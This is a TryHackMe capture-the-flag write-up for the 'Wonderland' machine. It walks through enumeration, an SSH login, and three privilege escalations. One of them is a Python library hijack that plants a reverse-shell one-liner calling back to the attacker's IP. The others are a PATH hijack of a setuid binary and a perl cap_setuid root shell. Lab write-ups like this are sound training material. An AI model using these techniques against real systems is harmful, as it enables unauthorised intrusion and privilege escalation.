Contents

TryHackMe : Wonderland WriteUp

This is my writeup for the wonderland room/machine of TryHackMe.com platform. Remember this is just how I solved/owned the machine, maybe there are different and fast paths but…

Machine

Fall down the rabbit hole and enter wonderland.

The machine is called wonderland, room wonderland, the link is https://tryhackme.com/room/wonderland. This is a medium machine, I spent more time than I tought but…it’s a really good exercise completing it! With this machine you can refresh a lot of good think with privilege escalation and how to read an elf file. Remember the IP is changing every time…

Recon

First of all I run a classic nmap scan:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
nmap -sC -sV -p- 10.10.40.248                                                                                                               
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-18 04:44 EST
Nmap scan report for 10.10.40.248
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I’m looking at a Linux machine with the two classic ports open: 22 and 80.

The website is just a single page:

../images/thm-wonderland/01.png
The Home Page

I run a cURL just in case I’m missing something

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
curl -L -i http://10.10.40.248             
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 402
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:45:08 GMT
Date: Tue, 18 Jan 2022 09:48:39 GMT

<!DOCTYPE html>
<head>
    <title>Follow the white rabbit.</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>
<body>
    <h1>Follow the White Rabbit.</h1>
    <p>"Curiouser and curiouser!" cried Alice (she was so much surprised, that for the moment she quite forgot how to speak good English)</p>
    <img src="/img/white_rabbit_1.jpg" style="height: 50rem;">
</body>    

The only new folder is the /img one and I’ll take a look in a bit.

I run a gobuster in order to check if there are some other pages hidden/not linked (for pages and directories)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
gobuster dir -u http://10.10.40.248 -w /usr/share/seclists/Discovery/Web-Content/common.txt  -s '200,204,301,302,307,403,500' -e -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.248
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Expanded:                true
[+] Timeout:                 10s
===============================================================
2022/01/18 04:50:26 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.40.248/img                  (Status: 301) [Size: 0] [--> img/]
http://10.10.40.248/index.html           (Status: 301) [Size: 0] [--> ./]  
http://10.10.40.248/r                    (Status: 301) [Size: 0] [--> r/] 


gobuster dir -u http://10.10.40.248 -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -z
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.40.248
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/18 04:51:51 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 0] [--> img/]
/r                    (Status: 301) [Size: 0] [--> r/]  
/poem                 (Status: 301) [Size: 0] [--> poem/]

and I notice there is a /r page, I browse to it

../images/thm-wonderland/02.png

Nice…but still nothing, just an html page without any other clue. The /poem page is the same, just a “non-sense” poem :)

I run another gobuster for the directories, this time I use the http://10.10.40.248/r as starting point…and voila! It appears there is a /a following the /r page

../images/thm-wonderland/03.png

Wait wait…what is following Alice? The white rabbit.

I’ve a clue: /r/a/, 99% sure the following pages will be /r/a/b/b/i/t

../images/thm-wonderland/04.png

and there it is! Still an normal page without any link, I run a cURL and

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
curl -L -i http://10.10.40.248/r/a/b/b/i/t
HTTP/1.1 301 Moved Permanently
Location: t/
Date: Tue, 18 Jan 2022 10:07:42 GMT
Content-Length: 0

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 782
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 01 Jun 2020 22:41:05 GMT
Date: Tue, 18 Jan 2022 10:07:42 GMT

<!DOCTYPE html>

<head>
    <title>Enter wonderland</title>
    <link rel="stylesheet" type="text/css" href="/main.css">
</head>

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:####THEPASSISHERE###</p>
    <img src="/img/alice_door.png" style="height: 50rem;">
</body> 

…finally I’ve the user and pass to access as alice!

Another clue - found it later - was present on the image white_rabbit_1.jpg

../images/thm-wonderland/05.png

If I download the image present on the home page and I analyze it with steghide I found a clue:

1
2
3
4
5
6
steghide extract -sf Downloads/white_rabbit_1.jpg                                                                                                                                                              
Enter passphrase: 
wrote extracted data to "hint.txt".
                                                                                                                                                                                                                                             
cat hint.txt                                
follow the r a b b i t 

yes…I’ll follow the /r/a/b/b/i/t :)

Initial foothold (as alice)

I connect to the machine via SSH using alice and the password found:

1
2
3
4
ssh alice@10.10.40.248    

...
alice@wonderland:~$ 

First of all I check what is present on my home directory

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
alice@wonderland:~$ ls -ltra
total 44
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwx------ 2 alice alice 4096 May 25  2020 .cache
-rw------- 1 root  root    66 May 25  2020 root.txt
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
-rw------- 1 alice alice    7 Jan 18 10:14 .python_history
drwxr-xr-x 5 alice alice 4096 Jan 18 10:14 .

The file root.txt will contains the root flag…for sure (and I can’t read it now) and the python script seems really interesting.

Now the tricky part: the hint on the room is Everything is upside down here.…well…if the root.txt is into alice’s homedir it means the user.txt is into the root’s homedir

1
2
3
alice@wonderland:~$ cat /root/user.txt
THM{......}

PrivEsc 1 (rabbit)

I run some classic commands in order to understand what I can and I can’t do

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

alice@wonderland:~$ cat /etc/sudoers.d/alice 
alice ALL = (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

alice@wonderland:~$ find / -perm -u=s -type f 2>/dev/null 
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/bin/fusermount
/bin/umount
/bin/ping
/bin/mount
/bin/su

alice@wonderland:~$ find / -type f -perm -04000 -ls 2>/dev/null 
   394282     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   394475     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   394471    428 -rwsr-xr-x   1 root     root         436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   524949    100 -rwsr-xr-x   1 root     root         100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   394289     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   393716     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   393920     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newuidmap
   394097     20 -rwsr-xr-x   1 root     root          18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   393714     76 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /usr/bin/chfn
   393936     60 -rwsr-xr-x   1 root     root          59640 Mar 22  2019 /usr/bin/passwd
   393809     76 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /usr/bin/gpasswd
   393919     40 -rwsr-xr-x   1 root     root          40344 Mar 22  2019 /usr/bin/newgrp
   393663     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   393918     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newgidmap
   393956     24 -rwsr-xr-x   1 root     root          22520 Mar 27  2019 /usr/bin/pkexec
   394061    148 -rwsr-xr-x   1 root     root         149080 Jan 31  2020 /usr/bin/sudo
   655427     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount
   655971     28 -rwsr-xr-x   1 root     root          26696 Mar  5  2020 /bin/umount
   655478     64 -rwsr-xr-x   1 root     root          64424 Jun 28  2019 /bin/ping
   655970     44 -rwsr-xr-x   1 root     root          43088 Mar  5  2020 /bin/mount
   655494     44 -rwsr-xr-x   1 root     root          44664 Mar 22  2019 /bin/su

alice@wonderland:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
tryhackme:x:1000:1000:tryhackme:/home/tryhackme:/bin/bash
alice:x:1001:1001:Alice Liddell,,,:/home/alice:/bin/bash
hatter:x:1003:1003:Mad Hatter,,,:/home/hatter:/bin/bash
rabbit:x:1002:1002:White Rabbit,,,:/home/rabbit:/bin/bash

Ok, it seems I can run the python script as the user rabbit (and gain access as rabbit), let’s read it:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
alice@wonderland:~$ cat walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.

...cut...

for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

The script is just importing a library (random) and is calling a method of this library (choice)…and printing some random string included on the script.

After a small research I found a good website with a well explanation of Python Library Hijacking:

https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/

According to the article at Method 2

This vulnerability is based on the priority order of the Python Library path that is applied to the Module file that our script is importing. When a module is imported in a script, the Python will look for the particular module file inside the default directories in particular priority order. In the python script that we created; we have the webbrowser.py module file that is called. The module that is being searched will be located in one of the default paths. Although if there exists a python module file in the same directory as the original script, it will get priority over the default paths.

What I have to do is creating a python file (or just copy the real random library) into the alice’s home dir, modify it with a reverse shell for example and run the script with sudo as rabbit.

Some other player just created a new script with a reverse shell or executed just a bash…my method is a little bit different and the same of the example present on the website: copy the random.py library, modify the choice method, open a new netcat listener on port 4444 and run the script (yes..more “difficult”)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
alice@wonderland:~$ cp /usr/lib/python3.6/random.py .
alice@wonderland:~$ pwd
/home/alice
alice@wonderland:~$ vi random.py

## -------------------- sequence methods  -------------------

    def choice(self, seq):
        """Choose a random element from a non-empty sequence."""
        try:
            #### the new line is this one:
            import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
            ####
            i = self._randbelow(len(seq))
        except ValueError:
            raise IndexError('Cannot choose from an empty sequence') from None
        return seq[i]


alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

and in the new listener the shell appears

1
2
3
4
5
6
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.188.29] 47908
$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
$ 

Good! I’m rabbit now…next step is moving into root! Ops, no! there is the hatter user before root.

PrivEsc 2 (hatter)

As usual, I run some classic commands in order to understand what I can and I can’t do

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
rabbit@wonderland:/home/rabbit$ ls -ltra
ls -ltra
total 40
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
drwxr-xr-x 6 root   root    4096 May 25  2020 ..
lrwxrwxrwx 1 root   root       9 May 25  2020 .bash_history -> /dev/null
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty
drwxr-x--- 2 rabbit rabbit  4096 May 25  2020 .

rabbit@wonderland:/home/rabbit$ file teaParty
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not stripped

rabbit@wonderland:/home/rabbit$  find / -type f -perm -04000 -ls 2>/dev/null 
 find / -type f -perm -04000 -ls 2>/dev/null 
  1049052     20 -rwsr-sr-x   1 root     root        16816 May 25  2020 /home/rabbit/teaParty
   394282     44 -rwsr-xr--   1 root     messagebus    42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   394475     16 -rwsr-xr-x   1 root     root          14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
   394471    428 -rwsr-xr-x   1 root     root         436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign
   524949    100 -rwsr-xr-x   1 root     root         100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   394289     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   393716     44 -rwsr-xr-x   1 root     root          44528 Mar 22  2019 /usr/bin/chsh
   393920     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newuidmap
   394097     20 -rwsr-xr-x   1 root     root          18448 Jun 28  2019 /usr/bin/traceroute6.iputils
   393714     76 -rwsr-xr-x   1 root     root          76496 Mar 22  2019 /usr/bin/chfn
   393936     60 -rwsr-xr-x   1 root     root          59640 Mar 22  2019 /usr/bin/passwd
   393809     76 -rwsr-xr-x   1 root     root          75824 Mar 22  2019 /usr/bin/gpasswd
   393919     40 -rwsr-xr-x   1 root     root          40344 Mar 22  2019 /usr/bin/newgrp
   393663     52 -rwsr-sr-x   1 daemon   daemon        51464 Feb 20  2018 /usr/bin/at
   393918     40 -rwsr-xr-x   1 root     root          37136 Mar 22  2019 /usr/bin/newgidmap
   393956     24 -rwsr-xr-x   1 root     root          22520 Mar 27  2019 /usr/bin/pkexec
   394061    148 -rwsr-xr-x   1 root     root         149080 Jan 31  2020 /usr/bin/sudo
   655427     32 -rwsr-xr-x   1 root     root          30800 Aug 11  2016 /bin/fusermount
   655971     28 -rwsr-xr-x   1 root     root          26696 Mar  5  2020 /bin/umount
   655478     64 -rwsr-xr-x   1 root     root          64424 Jun 28  2019 /bin/ping
   655970     44 -rwsr-xr-x   1 root     root          43088 Mar  5  2020 /bin/mount
   655494     44 -rwsr-xr-x   1 root     root          44664 Mar 22  2019 /bin/su

the most interesting file is the teaParty executable, nothing else is present and I focus on it.

The teaParty elf is nothing really important, if I run it I have just a seg fault

1
2
3
4
5
6
7
./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 18 Jan 2022 16:28:43 -0500
Ask very nicely, and I will give you some tea while you wait for him

Segmentation fault (core dumped)

I download the file into my kali box with netcat and I check it:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
objdump -s -j .rodata teaParty 

teaParty:     file format elf64-x86-64

Contents of section .rodata:
 2000 01000200 00000000 57656c63 6f6d6520  ........Welcome 
 2010 746f2074 68652074 65612070 61727479  to the tea party
 2020 210a5468 65204d61 64204861 74746572  !.The Mad Hatter
 2030 2077696c 6c206265 20686572 6520736f   will be here so
 2040 6f6e2e00 00000000 2f62696e 2f656368  on....../bin/ech
 2050 6f202d6e 20275072 6f626162 6c792062  o -n 'Probably b
 2060 79202720 26262064 61746520 2d2d6461  y ' && date --da
 2070 74653d27 6e657874 20686f75 7227202d  te='next hour' -
 2080 52000000 00000000 41736b20 76657279  R.......Ask very
 2090 206e6963 656c792c 20616e64 20492077   nicely, and I w
 20a0 696c6c20 67697665 20796f75 20736f6d  ill give you som
 20b0 65207465 61207768 696c6520 796f7520  e tea while you 
 20c0 77616974 20666f72 2068696d 00000000  wait for him....
 20d0 5365676d 656e7461 74696f6e 20666175  Segmentation fau
 20e0 6c742028 636f7265 2064756d 70656429  lt (core dumped)
 20f0 00       


strings teaParty
/lib64/ld-linux-x86-64.so.2
2U~4
libc.so.6
setuid
puts
getchar
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
;*3$"
GCC: (Debian 8.3.0-6) 8.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7325
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
teaParty.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
getchar@@GLIBC_2.2.5
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

The only interesting part is /bin/echo -n ‘Probably by ' && date –date='next hour’ -R and - checking it better - the date command is without the full/absolute path.

It means I can change the $PATH variable, add eg. the /tmp at the beginning of it and I can create a fake date command into /tmp who can spawn a shell. And - hopefully - being the hatter user

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
rabbit@wonderland:/$  export PATH=/tmp:$PATH
 export PATH=/tmp:$PATH                                                                                                                                                                                                                                 
rabbit@wonderland:/tmp$ echo '#!/bin/bash' > /tmp/date
rabbit@wonderland:/tmp$ echo '/bin/bash' >> /tmp/date
rabbit@wonderland:/tmp$ cat /tmp/date

#!/bin/bash
/bin/bash

rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ id
id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
hatter@wonderland:/home/rabbit$ 

And boom! I’m the user hatter, let’s check the home dir

1
2
3
4
5
hatter@wonderland:/home/rabbit$ cd ../hatter
hatter@wonderland:/home/hatter$ ls
password.txt
hatter@wonderland:/home/hatter$ cat password.txt
THISISTHEHATTERPASS

The password of the user hatter is present into the file! Good, let’s check via SSH

1
2
3
4
5
6
ssh hatter@10.10.188.29 
hatter@10.10.188.29's password: 

....

hatter@wonderland:~$ 

Good! Now it’s time to move to root

Final PrivEsc to root

As usual, I run some classic commands in order to understand what I can and I can’t do.

This time seems nothing is usable for moving to root but I forgot to check the cap_setuid

1
2
3
4
hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

I checked it before but it was not usable with the previous users but this time - if I remember well - it is:

1
2
3
4
ls -ltra /usr/bin/perl5.26.1
-rwxr-xr-- 2 root hatter 2097720 Nov 19  2018 /usr/bin/perl5.26.1
ls -ltr /usr/bin/perl
-rwxr-xr-- 2 root hatter 2097720 Nov 19  2018 /usr/bin/perl

To better undestand what the cap_setuid is check https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities

According to https://gtfobins.github.io/gtfobins/perl/#capabilities is pretty simple

1
2
3
4
5
6
7
8
hatter@wonderland:/$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
# whoami
root
# cd /home/alice
# cat root.txt
thm{thefinalflag}

and…machine owned!